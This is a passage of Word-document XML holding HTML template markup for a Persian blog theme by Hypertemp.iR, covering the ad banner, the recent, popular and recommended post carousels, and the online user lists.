    <w:p w14:paraId="4318CD01" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;aside class="pages"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297D692B" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>[Blog_Page]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B386D3D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC39619" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Blog_Page_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40622E39" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Pages End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11942530" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="7B636C2A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Ads Bottom Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30397D45" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Custom_Option_Block=6&gt;&lt;RB:Custom_Option_Title&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>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/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> بنر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t>&lt;/RB:Custom_Option_Title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28879D34" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;aside class="ads"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A6A543" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Custom_Option_Content&gt;&lt;a href="http://www.hypertemp.ir/page/ads" rel="nofollow" target="_blank"&gt;&lt;img alt="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>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/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> شما</w:t>
      </w:r>
      <w:r>
        <w:t>" src="http://up.hypertemp.ir/view/2219817/ADS-468-68-Blue.gif" height="60" width="468"&gt;&lt;/a&gt;&lt;a href="http://www.hypertemp.ir/page/ads" rel="nofollow" target="_blank"&gt;&lt;img alt="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>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/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> شما</w:t>
      </w:r>
      <w:r>
        <w:t>" src="http://up.hypertemp.ir/view/2219817/ADS-468-68-Blue.gif" height="60" width="468"&gt;&lt;/a&gt;&lt;/RB:Custom_Option_Content&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151EDF39" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C664620" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Custom_Option_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9D3136" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;!--Hypertemp.iR Ads Bottom End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B75BA8F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="4E82E6E6" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Last Posts Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE0F56D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Blog_Last_Posts_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67341157" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="title-asli"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538A2007" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;i class="fa fa-clock-o"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FB9C2F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;h3&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>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مطالب اضافه شده</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A3A9A3" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;h4&gt;Recently added posts&lt;/h4&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AFC813" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9B7677" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;aside class="owl-carousel-b"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791C8CD7" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="57541D99" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Blog_Last_Posts_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51005C69" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="item"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E5FC38" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="[Last_Post_Url]" title="[Last_Post_Title]" rel="bookmark" target="_blank" class="bg"&gt;&lt;img src="[Last_Post_Img]" alt="[Last_Post_Title]"&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33099C2E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;h2&gt;&lt;a href="[Last_Post_Url]" title="[Last_Post_Title]" rel="bookmark" target="_blank"&gt;[Last_Post_Title]&lt;/a&gt;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B94E28" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;span&gt;[Last_Post_Date]&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F805E8" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B078A04" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Blog_Last_Posts_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B46BB82" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="03942E0A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="66B6F7DE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144FEF5F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Blog_Last_Posts_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599EBC51" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Last Posts End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AB6118" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="7EB89E3F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Hit Posts Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9BD080" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Hit_Posts_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739A6A7B" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="title-asli"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F3E26E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;i class="fa fa-heart"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78423F3E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;h3&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>مطالب محبوب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t>&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208130F3" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;h4&gt;Most popular&lt;/h4&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173FA4D5" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA34EF3" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;aside class="owl-carousel-b"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3718BCBC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="4B0D46E5" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Hit_Posts_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5765ADC9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="item"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C8D5C1" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="[Hit_Posts_Link]" title="[Hit_Posts_Title]" rel="bookmark" target="_blank" class="bg"&gt;&lt;img src="[Hit_Posts_Img]" alt="[Hit_Posts_Title]"&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBD2FDF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;h2&gt;&lt;a href="[Hit_Posts_Link]" title="[Hit_Posts_Title]" rel="bookmark" target="_blank"&gt;[Hit_Posts_Title]&lt;/a&gt;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE24112" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">&lt;span&gt;[Hit_Posts_Count] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>مشاهده</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE73F2E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216FBA6E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Hit_Posts_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564FC508" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="4D46B127" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C06F891" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Hit_Posts_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227A8C86" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Hit Posts End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526DACD9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="548CD533" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Rand Posts Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DBF399" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Rand_Posts_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461D07E7" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="title-asli"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C50228" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;i class="fa fa-random"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF09F2F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;h3&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>مطالب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شنهاد</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C17A212" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;h4&gt;Recommended&lt;/h4&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B157C4" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B80E221" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;aside class="owl-carousel-b"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6FE36E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="1174CBD4" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;RB:Rand_Posts_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BC47D3" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="item"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1C5240" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="[Rand_Posts_Link]" title="[Rand_Posts_Title]" rel="bookmark" target="_blank" class="bg"&gt;&lt;img src="[Rand_Posts_Img]" alt="[Rand_Posts_Title]"&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8C50F8" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;h2&gt;&lt;a href="[Rand_Posts_Link]" title="[Rand_Posts_Title]" rel="bookmark" target="_blank"&gt;[Rand_Posts_Title]&lt;/a&gt;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410B0D57" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600B94E0" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Rand_Posts_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375B4026" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="42B8C56D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457AB559" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="0F8BED81" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Rand_Posts_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06231CFF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Rand Posts End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1C1FC8" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="2DFBF786" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="3653AE8A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/section&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435BBC53" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Main End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31548DFA" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="13D770C9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="4B0E9501" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/section&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097713DE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Blocks End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3841F095" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="54B7622A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="1A3DBD87" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Users Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9C9678" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;aside class="panel"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B455CCD" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="users"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F05EAD4" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">&lt;h3&gt;&lt;i class="fa fa-users"&gt;&lt;/i&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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کاربران متصل</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210EB65C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C76BE43" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Forum_Online_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026DFE30" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;RB:Blog_Online_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BD35DA" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C7D1CE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="[Online_Url]" title="[Online_Title]" rel="user" target="_blank"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC87BA4" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="on"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3C1812" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="avatar" style="background:url('/user/Avatar/hypertemp/[Online_Title].jpg'),url('/user/Avatar/hypertemp/[Online_Title].png'),url('/user/Avatar/hypertemp/[Online_Title].gif'),url(http://up.hypertemp.ir/view/2519939/img.jpg) center;background-size:cover;"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F744E0B" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="entery"&gt;&lt;span&gt;[Online_Title]&lt;/span&gt;&lt;samp&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>وضع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: انلا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>&lt;/samp&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE2DE3A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29743602" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A48A385" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Blog_Online_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB61960" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/RB:Forum_Online_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F885F1" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="64373103" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="34601E5A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Blog_User_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66792980" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Blog_User_Loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513A064A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;&lt;a href="[Blog_User_Url]" rel="user" target="_blank"&gt;&lt;div class="off"&gt;&lt;/div&gt;&lt;div class="avatar" style="background:url(http://up.hypertemp.ir/view/2519939/img.jpg) center;background-size:cover;"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A102936" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="1909DEC7" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="entery"&gt;&lt;span&gt;[Blog_User_Title]&lt;/span&gt;&lt;samp&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>وضع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: افلا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>&lt;/samp&gt;&lt;/div&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
